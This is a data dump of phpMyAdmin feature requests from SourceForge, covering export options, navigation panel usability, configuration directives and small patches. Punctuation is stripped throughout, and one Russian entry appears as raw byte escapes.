May be add a contion before writing filling code can solve this, if table.type != VIEW ?
I d like to suggest an improvement on databases export if i check to export user difined functions, they are writen at the end of the file.
But if i have views using thoose functions, i ll have an error because the functions are not yet defined, then the affected views are not defined...
I undestand this can be a problem if views are used in functions... so, may be it could be usefull to be able to indicate a choice while i m defining export parameters ?
Original URL https sourceforge.net p phpmyadmin feature requests 1417 Original author cyrano fr","enhancement"
"24444","6118","Parser doesn t handle nested selects.
I use phpMyAdmin 2.5.6 Here is a query I get from my bookmarks.
SELECT items.itemID, serialNumber, partNumber, S1.notes AS ACTIONNote, room, shelf, LEVEL , employees.firstName FROM items LEFT JOIN actions S1 ON S1.itemID = items.itemID LEFT JOIN locationInt ON locationInt.locationID = S1.locationIntID LEFT JOIN ToolsCommonDB.employees ON employees.employeeID = desk WHERE owner LIKE CS AND tmsp = SELECT max S2.tmsp ) FROM actions S2 WHERE S1.itemID = S2.itemID ) I use the export link at the bottom of the page.
When the page is displayed, the query has been changed to SELECT max S2 .
tmsp ) FROM actions S2 WHERE S1 .
itemID = S2 .
itemID ) My email is wilfried.kopp wanadoo.fr Best regards, Will Original URL https sourceforge.net p phpmyadmin feature requests 1419 https sourceforge.net p phpmyadmin feature requests 1419 Original author anonymous","enhancement"
"24444","6119","Hide Action column for unprivileged users in Users overview page.
If user does not have necessary privileges, hide the Edit user links Action column) in the Users overview page.
Original URL https sourceforge.net p phpmyadmin feature requests 1420 Original author sameerak","enhancement"
"24444","6120","Add retry button on connection failure with config auth.
When the database server is currently down and you try to load phpMyAdmin using config auth, there is no obvious way to reconnect besides the browserxe2x80x99s reload button).
We should add a xe2x80x9cRetry to connectxe2x80x9d button on the connection error page for config auth.
Original URL https sourceforge.net p phpmyadmin feature requests 1421 Original author mynetx","enhancement"
"24444","6121","Use only icons, only text or both.
Using Yes, No and Both as answers to this question is confusing.
Could you use Icons, Text and Both instead?
Original URL https sourceforge.net p phpmyadmin feature requests 1423 Original author olafvdspek","enhancement"
"24444","6122","Fallback for non Javascript environments.
So phpMyAdmin 4.0.0 requires Javascript.
Not well thought Javascript is one of the most common security holes in current browsers, after Flash and Java, of course.
As administering a DBMS is a security related task, it should not be mandatory to enable Javascript.
phpMyAdmin should have a fallback option for this.
Until then, I personally) will completely switch to Adminer.
Original URL https sourceforge.net p phpmyadmin feature requests 1424 Original author tuxman666","enhancement"
"24444","6123","No floating for server breadcrumb menu.
Navigation links at the top localhost > db > table are not easily selectable please use display inline block instead of float left for better UI useability Original URL https sourceforge.net p phpmyadmin feature requests 1468 Original author amibct","enhancement"
"24444","6124","Implement a virtual user level.
It is just my personal opinion but I think phpMyAdmin would need a virtual user level.
Virtual user level would be implemented by using two different accounts for mysql and for phpMyAdmin.
This includes the implementation of an administrator web page as well.
This optional feature would enable administrators to assign accounts with specific rights that do not just relate to the mysql privilege but rather the entire set of phpMyAdmin functions.
For example the administrator wants to allow a friend of his to be able to access and edit specific userxe2x80x99s privilege.
The current mySQL privilege set is too broad and can not create subsets.
With the virtual account layer we can customize and create an independent protecting layer towards the database.
This feature will hopefully increase the use of phpMyAdmin in other applications than database management Which few people could argue is its main purpose).
It could be potentially used whenever information needs to be shared even with the users of the database without jeopardizing the entire integrity and security of the database.
Conclusion, the current mySQL privileges are too broad and really good for administrative purposes but I would be glad to see phpMyAdmin to expand its user base.
Example of applications with the virtual layer would be on a shared database.
Or for purposes of debugging.
The owner of the database can assign to the developer to a limited set of operations without jeopardizing the entire security of the database.
The request is related to my application for GSOC for which I was asked to post this feature request here.
I would be glad to get any feedback.
Original URL https sourceforge.net p phpmyadmin feature requests 1425 Original author ifostiropoul","enhancement"
"24444","6125","Navigation state lost on reload.
When reloading the page, navigation panel state is lost.
I believe it would be more expected behavior to remember navigation state and restore it.
Original URL https sourceforge.net p phpmyadmin feature requests 1426 Original author nijel","enhancement"
"24444","6126","Add suggestion to disable mysqi in config to error message mysqli not enabled on server.
This feature request relates to version 4.0.0 When mysqli is disabled on the server, calling index.php from a fresh install resulted in an error message saying that mysqli is not enabled.
I suggest to mention in this error message that in the config.inc.php file mysqli can be switched off as an alternative.
For enabling mysqli the server administrator rights are required while for editing the config.inc.php this is not the case.
See also screenshot below in Dutch, The Netherlands) http screencast.com t Vl7lhLhM4x Original URL https sourceforge.net p phpmyadmin feature requests 1427 Original author marckropholler","enhancement"
"24444","6127","add new database entry to nav tree.
it seems like there should be an entry in the nav tree to create a new database to match up with new tables, columns, functions, etc.
Original URL https sourceforge.net p phpmyadmin feature requests 1428 Original author q7joey","enhancement"
"24444","6128","Possibility to use home user file.sql as SQL file upload patch, browse in local server user files and use url.
Possibility to use home user file.sql as SQL file upload patch, browse in local server user files and using url as SQL file location.
Right now SQL file can only be uploaded from your computer which means if you have slow internet connection or server further away from your physical location using previous uploading with FTP or any other means could speed up and quarantee quality of SQL file rather then having it getting interrupted before uploading finishes.
My issue came op with United States, Kansas City located server and my own location in Northen Europe, Estonia.
With file about 98 Mb large.
Original URL https sourceforge.net p phpmyadmin feature requests 1430 Original author cemtey","enhancement"
"24444","6129","The pares dropdown does not match the pages.
See screenshot for details.
phpmyadmin counts 755 rows in this table, but after page 695 there are no data.
A COUNT ) in this table gives me 694 rows.
Original URL https sourceforge.net p phpmyadmin feature requests 1431 Original author fu86 Attachment http sourceforge.net p phpmyadmin feature requests 1431 attachment 2013 05 17 181045 922x547 scrot.png","enhancement"
"24444","6130","Add table name to messsage.
> This table does not contain a unique column.
Grid edit, checkbox, Edit, > Copy and Delete features are not available.
the message is nice after select all tables and optimize but who is this table means would be nice to display the table name!
Original URL https sourceforge.net p phpmyadmin feature requests 1432 Original author ruleant","enhancement"
"24444","6131","Central columns list.
A shortcoming of MySQL is that columns are defined per table, with no central list of columns.
Benefits of a central list of columns include avoiding similar name for the same data element, for example product id and prod id consistency of data type for the same data element shortcut to add an element from the central list to a table s structure The phpMyAdmin configuration storage would be the place to maintain this central list probably per database).
Original URL https sourceforge.net p phpmyadmin feature requests 1477 Original author lem9","enhancement"
"24444","6132","Improvements to the table browsing navigation bar.
A query generally results in a number of rows which don t fit in a single page 30 rows by default).
Often the user will browse through the result set.
phpMyAdmin allows this with a menu at the top of the page.
It allows to select the results page desired, or to request a custom range Show ).
Sometimes, another element offering a preset range appears Show all ).
The display of these elements is suboptimal.
The current range is shown separate from this menu.
The Show all button does not always display see Debian ticket 658402) and shows in the page browsing area when it does.
Headers every [x] rows has too much prominence for such a secondary feature it should display smaller or even in the Options zone below).
Beyond clarity, there s an efficiency issue.
The custom range area is very flexible, but makes very common operations slow.
If I simply want to display more rows, I need to type the number of rows wanted then select Show .
In comparison, MediaWiki s page history browsing offers page size preset 25, 50, 100, 250, 500).
A single click can change the number of rows.
For what it s worth, I browsed page histories thousands of times, and I never had the idea that MediaWiki s page revisions browsing should be designed differently, even though it s far from phpMyAdmin s flexibility but page history browsing and result set browsing may not be really comparable use cases).
Simply offering presets other than Show all either as links or in a dropdown) would make browsing much more efficient.
An entirely different approach would be dynamic fetching of records a la Sybase Central.
There is no single way of doing things and I don t want to request too specific improvements, but failing an overhaul of browsing, there s one trivial change which would already help a lot.
The use case of showing more rows is in fact longer than what I described above.
Before selecting Show , one needs to reset Start row to 0, since it defaults to the page size.
The current behavior allows to go the next page by simply selecting Show , but there is since a long time) a simpler way to do that selecting the right arrow.
It would seem much more logical that if one selects Show without having changed anything, the result set wouldn t vary.
Original URL https sourceforge.net p phpmyadmin feature requests 1434 Original author chealer","enhancement"
"24444","6133","Opening database should expand it in the navigation menu.
When clicking a database name in the navigation frame, the database should expand at least one level to show the names of tables or the Tables and Views submenus.
Perhaps, even, Tables and Views should be expanded by default.
Original URL https sourceforge.net p phpmyadmin feature requests 1435 Original author ibennetch","enhancement"
"24444","6134","Metro theme compatible with version 4.X.
Can we get an updated version of Metro 2.0 which is compatible with phpMyAdmin 4.X.
I ve been waiting on upgrading because I love the Metro theme so much.
Original URL https sourceforge.net p phpmyadmin feature requests 1436 Original author justink101","enhancement"
"24444","6135","Configure Text Icons Both separately for tabs and in table edits.
Previous phpMyAdmin versions could be configured to use both icons and text for tabs above the table view, but icons only for in table edit features.
cfg[ NavigationBarIconic ] = both ; cfg[ PropertiesIconic ] = true; In current versions I am unable to configure it so that both icons and text are used for the tabs above there is enough space to be verbose), but only icons in the tables there I would prefer to reduce the width).
Using the setup dialogs, I can only change both at the same time.
I would have to discover where the configuration is currently stored, and alter these options manually or possibly export it to a JSON file, edit it manually, and import it back; but when I tried that, the tabs show only icons, no text).
Original URL https sourceforge.net p phpmyadmin feature requests 1437 Original author ligh1l","enhancement"
"24444","6136","Export make adding CREATE DATABASE optional.
Version 4.0.x adds CREATE DATABASE statement when exporting whole database.
Please add option and a config parameter) to disable this behavior.
Original URL https sourceforge.net p phpmyadmin feature requests 1438 Original author a ulasov","enhancement"
"24444","6137","Make bulky features optional reduce upload footprint.
The problem when upgrading phpMyAdmin on basic shared hosting using FTP, by default there is 19 MB of files to upload!!
And that s just the English version.)
If I look through the code I can see several things that I think) are optional to upload, such as the docs and js jquery src folders.
I think all of that stuff should be moved into one folder.
And there is also everything in the lib folder.
It seems you can t just remove the stuff you don t want need.
For example I don t care about the PDF or charting plugins, but I need to upload these each time I upgrade PMA.
Original URL https sourceforge.net p phpmyadmin feature requests 1484 Original author svivian","enhancement"
"24444","6138","Ability to name a host in config.inc.php.
Add name to config, example cfg[ Servers ][ i][ name ] = nickname for host ; I use phpmyadmin like this I install it on my own computer and I have persistent ssh tunnels going to the mysql servers.
This makes connecting little bit difficult because all hosts are localhost in the drop down.
If I could give the hosts a nick name it would make my life just a little bit easier ) Original URL https sourceforge.net p phpmyadmin feature requests 1439 Original author ahto111 Attachment http sourceforge.net p phpmyadmin feature requests 1439 attachment phpmyadmin many localhost.png","enhancement"
"24444","6139","Add regexp match when using AllowArbitraryServer.
When using config option AllowArbitraryServer , any server can be accessed through PMA.
But when this option is used, often servers follow the same form 192.168.0.X XXX mysql etc.
It would be useful to add a config option labeled ArbitraryServerRegexp that would consist of a regular expression that the server name must match, if this config option is present.
Examples cfg[ ArbitraryServerRegexp ] = 192.168.0.
[0 9]{1,} ; cfg[ ArbitraryServerRegexp ] = \ mysql ; cfg[ ArbitraryServerRegexp ] = server1|server2|server3) ; Original URL https sourceforge.net p phpmyadmin feature requests 1441 Original author odoucet","enhancement"
"24444","6140","Export page should remember state when toggling Quick Custom.
From the Export page, assume the Quick checkbox is selected.
In the Output region, we have two checkboxes available.
Selecting one or both of them then toggling to the Custom view should probably leave them in the previous state; instead it resets them both to unchecked.
Original URL https sourceforge.net p phpmyadmin feature requests 1442 Original author ibennetch","enhancement"
"24444","6141","Config Option for Client Server Version Check.
I m not sure its a Bug or Feature Request, we have a shared Setup off phpMyAdmin for several Customers.
In the newest Version of phpMyAdmin there is a check that the MySQL Client Version is same as the Server Version, and these normally don t match in our Setup, allthough we hadn t a problem because of that until now.
So my Question is, we need a Config Option to disable that Version Check and dont show a error message to the Customer, thank you!
Original URL https sourceforge.net p phpmyadmin feature requests 1443 Original author benrik","enhancement"
"24444","6142","server parameter can accept server verbose name.
Sometimes mysql server can be added to config or deleted from it.
This action can change order of cfg[ Servers ] and links like http pma index.php?server=9 open different db than before.
verbose name for server can be used as value of server parameter e.g.
http pma index.php?server=MY MASTER 1 Currently, to add this feature, I changed libraries common.inc.php like this 760c760,763 lt; if server[ host ] == REQUEST[ server ]) { gt; if server[ host ] == REQUEST[ server ] gt; || mb strtolower server[ verbose ]) == mb strtolower REQUEST[ server ]) gt; || mb strtolower substr server[ verbose ],0,strpos server[ verbose ], ))) == mb strtolower REQUEST[ server ]) ) { Original URL https sourceforge.net p phpmyadmin feature requests 1444 Original author fustundag","enhancement"
"24444","6143","Webuzo phpMyAdmin Stack.
LAMP Appliance from Webuzo includes all you need to run LAMP Linux, Apache, MySQL, PHP Python Perl) together with phpMyAdmin to manage MySQL.
IT is also available in the form of ready to cook VMs.
Webuzo also allows to quickly deploy phpMyAdmin on the AWS Amazon Cloud.
Webuzo maintains the reviews,ratings, demos,screen shots, features on it individual page.
You can download the phpMyAdmin Virtual Appliance here http webuzo.com apps dbtools phpMyAdmin Could you list Webuzo phpMyAdmin Stack on your downloads page to ease user experience ?
Thanks in advance.
Original URL https sourceforge.net p phpmyadmin feature requests 1446 Original author valley webuzo","enhancement"
"24444","6144","Character Sets and Collations page tables.
The Character Sets and Collations page in 4.0.5 shows four columns of tables with two columns each) without significant margin between the tables, causing readability to suffer.
Could you use a single table column?
If you can t, could you at least increase the margins?
Original URL https sourceforge.net p phpmyadmin feature requests 1447 Original author olafvdspek","enhancement"
"24444","6145","Allow clicking an approximate row count to get a correct one.
When I m using phpMyAdmin normally, I want the table structure page to load as quickly as possible, so I set the threshold level for approximate row counts to a fairly low number.
However, just sometimes I want to be able to quickly see the exact row count for a table.
It would be nice if I could click on 1,234,567 and have it go and do an exact count and replace 1,234,567 with 1,500,000 .
Clicking on the sum at the bottom should go and update all the row counts on the page.
Original URL https sourceforge.net p phpmyadmin feature requests 1448 Original author m jaggard","enhancement"
"24444","6146","Syslog authentication requests brute force protection.
Currently phpMyAdmin lacks means to protect against brute force attacks, which poses a security risk.
Since most most users are on Linux but this solution could work on other platforms too), i would like to propose logging authentication processes to syslog.
Then sysadmins could easily implement reactive protections, such as a fail2ban filter, denyhosts, etc... and there s no need for phpMyAdmin to implement any banning mechanism and reinvent the wheel.
As an example, the setup i m currently using is sending a line to syslog on failed accesses on libraries auth cookie.auth.lib.php, with syslog LOG AUTHPRIV, phpMyAdmin cookie) wrong credentials from .
SERVER[ REMOTE ADDR ]); Then i have a fail2ban filter that processes var log secure and bans reincident offenders.
I propose to A) Add a configuration to control wether to send those messages to syslog or not B) Log all activity to syslog, so that there s a log of failed successful logins and sysadmin can act on it Going one step further, configuration could be a int loglevel) or string log file path).
Original URL https sourceforge.net p phpmyadmin feature requests 1449 Original author palewolf","enhancement"
"24444","6147","Update jQuery and jQueryUI.
Please update jQuery to the latest version and jQueryUI too.
The current versions are very old.
Thank you!
Original URL https sourceforge.net p phpmyadmin feature requests 1494 Original author dennis1993","enhancement"
"24444","6148","Cache on welcome page.
Hey guys, if I visit phpmyadmin.net I see at first the latest release.
It is 4.1.5.
At each visit, I have to press F5 so I can see the current version.
It is possible to fix it, so that the latest version is correct without press F5, please?
Thank you!
Original URL https sourceforge.net p phpmyadmin feature requests 1496 Original author dennis1993","enhancement"
"24444","6149","HTML5 input tag enhancements.
HTML5 adds support for new input field types and attributes.
phpMyAdmin should make use of them such as input[type=number|date|time], min|max|required|placeholder) to enhance UX.
Original URL https sourceforge.net p phpmyadmin feature requests 1451 Original author mynetx","enhancement"
"24444","6150","[setup] Use input[type=password].
For security reasons, the setup configuration editor should use input[type=password] for server connection passwords.
Original URL https sourceforge.net p phpmyadmin feature requests 1452 Original author mynetx","enhancement"
"24444","6151","Database unfold in selection.
Hey guys, it is possible to open the database structure if I select a database in the left panel?
Currently have to always click on the and annoying.
Previously it went ever on automatically.
Thanks in advance!
Original URL https sourceforge.net p phpmyadmin feature requests 1453 Original author dennis1993","enhancement"
"24444","6152","New directive RowActionType.
Good day.
I m from Russia, so I apologize for any errors.
Can you add a new parameter in the configuration?
It`s in table listing.
cfg[ ModifyDeleteImageText ] = text|image|both Now shows the text with pictures.
But I would like to be able to leave only the image, or text only, or both.
Original URL https sourceforge.net p phpmyadmin feature requests 1455 Original author klaxwork Attachment http sourceforge.net p phpmyadmin feature requests 1455 attachment sourceforge.JPG","enhancement"
"24444","6153","Navi panel and views.
In the navi panel, clicking on Views or Tables has the same effect of showing both tables and views in the main panel.
It would make more sense to only show views or tables.
Original URL https sourceforge.net p phpmyadmin feature requests 1456 Original author lem9","enhancement"
"24444","6154","Stone Age icon found.
Hey guys, I have found a very ugly icon in phpMyAdmin.
It is possible to change it?
It looks like Windows 95.
I have made a screenshot and a new example for it.
Maybe you can change it.
Thank you ) Original URL https sourceforge.net p phpmyadmin feature requests 1457 Original author dennis1993 Attachment http sourceforge.net p phpmyadmin feature requests 1457 attachment pma whats that.png","enhancement"
"24444","6155","Auto Updater in home window.
Hello guys, it is possible to integrate a auto updater for phpMyAdmin?
I always use the latest version.
So I download it and upload it on my webserver.
Other CMS for example has a auto update.
So I click on update now and a script download the zip package, extract it and overwrite all files and the new version ist installed.
It is possible to implement this feature for phpMyAdmin?
Thank you in advance!
Original URL https sourceforge.net p phpmyadmin feature requests 1458 Original author dennis1993 Attachment http sourceforge.net p phpmyadmin feature requests 1458 attachment pma auto update.png","enhancement"
"24444","6156","The new Navigation Tree has issues, is inconvenient.
Hey guys, thanks for the good job everyone does with making PMA, I love it, it s great and easy to use!
Except for that one feature in the latest update, I am unfortunately not so happy with.
I used to be able to open PMA, and within 2 clicks !)
and NO loading I d be inside the table I need to be in and do edits, etc.
Now I have to do up to 5 clicks, with about a half second AJAX load after each click, then type my search term, and click again...
I dont know if that is because of how my hoster has the space set up, but it seems awfully cumbersome.
Please see my attachment for a demonstration.
If you want to split up the list of tables in the nav into multiple pages, okay the search function at least lets you access any table you know the name of.
But if the search result happens to be outside the current page, then it ll show a link 1 other result found and you have to click to show it... Why can t the search results just show all results RIGHT AWAY? )
I guess to fix the cumbersome navigation tree I d like to see either an option for the old navigation tree or a search box in the root directory that will allow me to type my table name and then i can click on that to expand it right away.
The last issue that happens with the new navigation is that after long idle times it will spit out a message invalid token if I click on anything inside the navigation and I actually have to refresh the complete page, pretty much restart PMA, and do all the five clicks again to get back to what I was working on.
I used to be able to put the computer to hibernation, turn it on the next day, and be able to click right away inside PMA with no authentication issues.
Not sure if that s a bug in the token validation system with the new nav, or if you had to add it for security.
If that latter is the case, I understand why it has to be there...
So here again my summary of issues with the new Navigation Tree Searching within a database will spit out 1 other result found instead of showing this result, if the result was not on the current page of tables viewed.
SUGGESTION Just show the result, don t bother with the link... Awfully cumbersome to navigate through the tree to get to where you need to be, used to be more convenient in the past.
SEE ATTACHMENT.
SUGGESTION Add a search field in the root that will search all databases and show results with expanded tree options; OR give user an option how to display the navigation tree by default including pagination) After long idle times clicking in the expanded Nav Tree will trigger Token Verification errors, resulting in PMA needing to be restarted.
SUGGESTIONS None, it s too deep in the back end for me ) Thanks for listening, I hope to see some improvements in future releases and I hope I can get my hoster to stay on top of updating D ) Original URL https sourceforge.net p phpmyadmin feature requests 1459 Original author ollimatrix Attachment http sourceforge.net p phpmyadmin feature requests 1459 attachment pmaclicks.png","enhancement"
"24444","6157","Redirect to login page after session has expired.
Currently the session might have expired, but this won t be visible on the interface.
As a matter of fact, the interface is still usable namely the navigation bar) and if the session has expired, an error box will pop up with a link for logging in again.
How about we detect if the session is still valid, and if not automatically redirect to the log in page?
That seems better then first getting the impression that everything may work fine, and then having to do another click after realizing it didn t. Original URL https sourceforge.net p phpmyadmin feature requests 1460 Original author ollimatrix","enhancement"
"24444","6158","Import happily doesn t do anything with no file name provided.
In the Import tab, if no filename is given, it s still possible to submit the form.
The resulting error is a bit misleading `No data was received to import.
Either no file name was submitted, or the file size exceeded the maximum size permitted by your PHP configuration.
See FAQ 1.16.` We should first check whether a file name was actually provided.
Original URL https sourceforge.net p phpmyadmin feature requests 1512 Original author ibennetch","enhancement"
"24444","6159","Highlight required form fields after failed submission.
There are times when we require a form field; for instance on the Operations tab of a database when trying to rename the database, that don t use a consistent means of notifying the user that they left it blank.
I like the notification used on the main Databases page when no name is provided or from a database Structure page when creating a new table with no name.
This highlights the field with a red highlight and gives a polite popup saying Please fill out this field .
I m collecting here the places in code where we do not use this style.
Operations tab of any database; the rename field.
Operations tab of any database; the copy field.
Add user dialog several fields) Original URL https sourceforge.net p phpmyadmin feature requests 1513 Original author ibennetch","enhancement"
"24444","6160","See all databases in the left column.
instead of having a page selector, make the view able to print all databases.
on the left column) Original URL https sourceforge.net p phpmyadmin feature requests 1461 Original author lengen1971","enhancement"
"24444","6161","Show table comment on navigation panel.
column with comment are show in various places in phpmyadmin dashed underline and comment on hover).
the same behavior could be used for tables at least in the navigation panel and maybe in db structure.php.
it s already visible when we select the table but not before Original URL https sourceforge.net p phpmyadmin feature requests 1462 Original author mathroc","enhancement"
"24444","6162","SQL import size limit.
Current sql import limit is Max 2,048KiB).
I think it is better if user can specify this value.
At least this feature should enable when user use a local server.
Original URL https sourceforge.net p phpmyadmin feature requests 1516 Original author hasithapsd1","enhancement"
"24444","6163","filter tables with regexp.
When there is a lot of table it could be much faster to filter tables with a regular expression, eg typing pr.
ca instead of products categories the table products can be much more easily this way too if there is a lot of table with products in their name search for products Original URL https sourceforge.net p phpmyadmin feature requests 1463 Original author mathroc","enhancement"
"24444","6164","1435 not fixed for multiple DB s. Feature request 1435 is not fixed if there are multiple DBs set up, each with only db .
Every time accessing a db via the dropdown you have to click and wait for ajax) twice to get to tables or views.
Original URL https sourceforge.net p phpmyadmin feature requests 1464 Original author co operation mm","enhancement"
"24444","6165","Support connections to IPv6 only MySQL instances.
We should support and document) connecting from phpMyAdmin to a MySQL server that is only available by IPv6 connection.
Original URL https sourceforge.net p phpmyadmin feature requests 1465 Original author ibennetch","enhancement"
"24444","6166","Minor refactoring required.
PMA Util getLatestVersion ) and PMA sendErrorReport ) do very similar things executing an HTTP request, it would be nice to refactor some of this functionality to reduce code duplication.
Original URL https sourceforge.net p phpmyadmin feature requests 1466 Original author roccivic","enhancement"
"24444","6167","Define an absolute path to use for require statements.
I m bootstrapping user authentication for phpMyAdmin with WordPress, and probably going to end up hacking the core of phpMyAdmin a bit to get it working properly.
The issue I m having is that within phpMyAdmin, a few require and require once expressions use a .
path to file.php structure, so the file that I bootstrap phpMyAdmin must be located in the same folder as phpMyAdmin s root.
May I suggest conditionally defining a constant and using it for require expressions?
<?php if !
defined PHPMYADMIN ROOT ) ) define PHPMYADMIN ROOT , dirname FILE ) .
); require PHPMYADMIN ROOT .
path to file.php ); ?> Original URL https sourceforge.net p phpmyadmin feature requests 1467 Original author ericandrewlewis","enhancement"
"24444","6168","pma lang and pma collation connection cookies timeout.
why are the cookies pma lang and pma collation connection set to expire more then 1 month out while the other cookies are set to expire at the end of the session.
Is there a reason cookies pma lang and pma collation connection can not be set to expire at the end of session?
We are using phpAdmin as part of the Appian cloud.
Our security scan team asking above questions.
These phpAdmin default settings not configurable.
Original URL https sourceforge.net p phpmyadmin feature requests 1469 Original author joe678","enhancement"
"24444","6169","Editing without Primary key.
Editing Rows without Primary key as in old Phpmyadmin Versions.
Original URL https sourceforge.net p phpmyadmin feature requests 1470 Original author lord rod","enhancement"
"24444","6170","Left navigation turn off filter TABLES VIEWS.
See the attach image showing the new feature separating tables views in the left navigation.
After using it for a week its just gets annoying having to keep opening the table each time I swap database Original URL https sourceforge.net p phpmyadmin feature requests 1471 Original author gizmojo Attachment http sourceforge.net p phpmyadmin feature requests 1471 attachment xh6gP.jpg","enhancement"
"24444","6171","Break Edit privileges with sub menus.
The Edit privileges page would benefit from sub menus, like on the Settings or Status pages.
Original URL https sourceforge.net p phpmyadmin feature requests 1472 Original author lem9","enhancement"
"24444","6172","Generate keys one per line, like foreign key constraints.
Since the completion of 1004 a few days ago, all the indices are generated using a separate ALTER TABLE statement.
This statement is generated on one line for all the indices of the table.
Is it possible to generate each ADD KEY ... segment on a separate line just like with foreign key constraints?
This is really important to be able to easily compare structural differences between two dumps using a file compare tool.
When the indices were embedded in CREATE TABLE statements, they were generated one index per line.
Original URL https sourceforge.net p phpmyadmin feature requests 1525 Original author artemkh","enhancement"
"24444","6173","Transformation to convert Boolean values to text.
To make up for MySQL s lack of a true Boolean column type, I wrote a transformation that will display quasi Boolean data with the user s choice of text.
It s called Bool2Text and will substitute the supplied false text for a value that is identically 0 and the true text for any other value.
The transformation has 2 options, true text and false text , in that order.
These default to T and F but can be set to anything else like, say, oui and non including F and T if you re perverse).
Files attached.
G. R. Lewis Original URL https sourceforge.net p phpmyadmin feature requests 1473 Original author roblewis Attachment http sourceforge.net p phpmyadmin feature requests 1473 attachment Text Plain Bool2Text.class.php","enhancement"
"24444","6174","Text transformation combines Append and Prepend.
I ve modified the Append text transformation to accept two parameters one text string to be prepended to the data, and a second string to be appended.
Both default to empty strings, and either or both may be used.
I m not wild about the name I came up with, but hopefully it gets the idea across PreApPend .
Original URL https sourceforge.net p phpmyadmin feature requests 1474 Original author roblewis Attachment http sourceforge.net p phpmyadmin feature requests 1474 attachment PreApPendTransformationsPlugin.class.php","enhancement"
"24444","6175","inline query box vertical resize.
Hello, could be a nice feature if inline query edit box would have vertical resize.
Sometimes it s faster to edit in here than open popup query window.
Also sometimes after editing inline query, result is not edited but previous query before edit.
Sorry if I m posting in wrong place.
Original URL https sourceforge.net p phpmyadmin feature requests 1475 Original author kaalis","enhancement"
"24444","6176","favourite tables select box.
recent tables select box is cool i would also need favourite tables select box right bellow the first one i use some tables all the time so i need some quick jump to these tables thanks Original URL https sourceforge.net p phpmyadmin feature requests 1476 Original author freeman3","enhancement"
"24444","6177","Feature request show database creation date.
Feature request show database creation date, ability to sort e.g.
latest first) on the database list page.
It would be great to have the database creation date on the database list in standard view, or when you enable statistics view.
Original URL https sourceforge.net p phpmyadmin feature requests 1533 Original author admirau","enhancement"
"24444","6178","Make Column Headings Sticky.
Based on a comment made on bug 4170 http sourceforge.net p phpmyadmin bugs 4170 ?limit=10 page=2 4fb5), I m making a feature request for the column headings in the Browse and other SQL results to be sticky so they stay at the top of the list when the user scrolls through the rows.
This improves the experience, and prevents scrolling back to the headers on large tables.
Since it s already being done for the main navigation, it doesn t seem like this would be jarring or confusing for users in any way.
A similar tactic could be taken on horizontal axis with the row level actions, although this may undesirably reduce the amount of visible space for row data on narrow viewports.
Feedback is welcome.
Original URL https sourceforge.net p phpmyadmin feature requests 1478 Original author justbeez","enhancement"
"24444","6179","Comments for databases, tables, columns.
Hi everyone!
For 10 years the use of phpMyAdmin really want to see the comments to display database and table next to their name.
Modifications looked not much.
Please do.
[[img src=img23.jpg alt=foobar]] Original URL https sourceforge.net p phpmyadmin feature requests 1534 Original author gavrilow Attachment http sourceforge.net p phpmyadmin feature requests 1534 attachment img23.jpg","enhancement"
"24444","6180","SQL query editor with autocomplete feature.
Hi everyone I just planned to develop auto complete enabled SQL Query editor, I searched about the codemirror and Chrome Devel tool ,We should make a autocomplete part like chrome s developer console .Databases, tables, columns Just the names) must stored temporally when SQL editor is open because making request for every suggestion is not good for quick suggestion and for the developers it will not help if it have a delay , After the successful execution of a SQL query we can wipe the temporary memory .
Any suggestion?????
Original URL https sourceforge.net p phpmyadmin feature requests 1535 Original author biruntha","enhancement"
"24444","6181","Relations edit form for larger monitors.
xd0x92xd0xbdxd0xb5xd1x88xd0xbdxd0xb8xd0xb9 xd0xb2xd0xb8xd0xb4 xd1x80xd0xb0xd0xb7xd0xb4xd0xb5xd0xbbxd0xb0 xc2xabxd0xa1xd0xb2xd1x8fxd0xb7xd0xb8xc2xbb http clip2net.com s 6s8E80 xd0x96xd0xb5xd0xbbxd0xb0xd1x82xd0xb5xd0xbbxd1x8cxd0xbdxd0xbe xd1x80xd0xb0xd0xb7xd0xbcxd0xb5xd1x81xd1x82xd0xb8xd1x82xd1x8c xd1x8dxd0xbbxd0xb5xd0xbcxd0xb5xd0xbdxd1x82xd1x8b xd1x84xd0xbexd1x80xd0xbcxd1x8b xd0xb0xd0xb2xd1x82xd0xbexd0xbcxd0xb0xd1x82xd0xb8xd1x87xd0xb5xd1x81xd0xbaxd0xb8 xd0xb2 xd0xbexd0xb4xd0xbdxd1x83 xd1x81xd1x82xd1x80xd0xbexd0xbaxd1x83 xd0xbfxd1x80xd0xb8 xd0xb1xd0xbexd0xbbxd1x8cxd1x88xd0xbexd0xbc xd1x80xd0xb0xd0xb7xd1x80xd0xb5xd1x88xd0xb5xd0xbdxd0xb8xd0xb8 xd1x8dxd0xbaxd1x80xd0xb0xd0xbdxd0xb0 xd0xbcxd0xbexd0xbdxd0xb8xd1x82xd0xbexd1x80xd0xb0 Original URL https sourceforge.net p phpmyadmin feature requests 1479 Original author greenpeas26","enhancement"
"24444","6182","Enhance privileges initials table.
The user name initials table in the server privileges could have some improvements to usability It should visually indicate which letter is active.
In the Show all button, there are superfluent square brackets.
When middle clicking the letters to force open a new tab, the initials bar will be missing there.
Original URL https sourceforge.net p phpmyadmin feature requests 1480 Original author mynetx","enhancement"
"24444","6183","Need Support Time DateTime TimeStamp dynamic columns.
Please read this article https mariadb.com kb en microseconds in mariadb Mariadb support dynamic column type like ... datetime 3) datietime 6) Phpmyadmin can t create datetime N) in Web UI mode.
Original URL https sourceforge.net p phpmyadmin feature requests 1481 Original author pigochu","enhancement"
"24444","6184","error windows should have a scroll bar.
As SQL queries can have an arbitrary length, it is not guaranteed that error windows that include the statement can be read unless the windows where they are shown have scroll bars.
Please have a look at the attached image for an example.
Note It would already be helpful if the MySQL message would be printed first and the SQL statement last.
Original URL https sourceforge.net p phpmyadmin feature requests 1482 Original author laue Attachment http sourceforge.net p phpmyadmin feature requests 1482 attachment phpmyadmin.jpg","enhancement"
"24444","6185","Option to export database without triggers.
Currently 4.1.3) export database without routines, is possible.
Same way, better to have a check box to include or not) trigger statements.
By default triggers will be exported.
Original URL https sourceforge.net p phpmyadmin feature requests 1483 Original author chanaka777","enhancement"
"24444","6186","adding feature in Partition maintenance.
Hi, can you add drop partition on the Partition maintenance?
I mean to be able to drop a partition itself, and not Remove partitioning of the table.
Original URL https sourceforge.net p phpmyadmin feature requests 1485 Original author jfdionne","enhancement"
"24444","6187","Possibility of disabling database expansion.
i want to propose for this project to be able to disable in config.php expanding the database menu view in mainmenu.
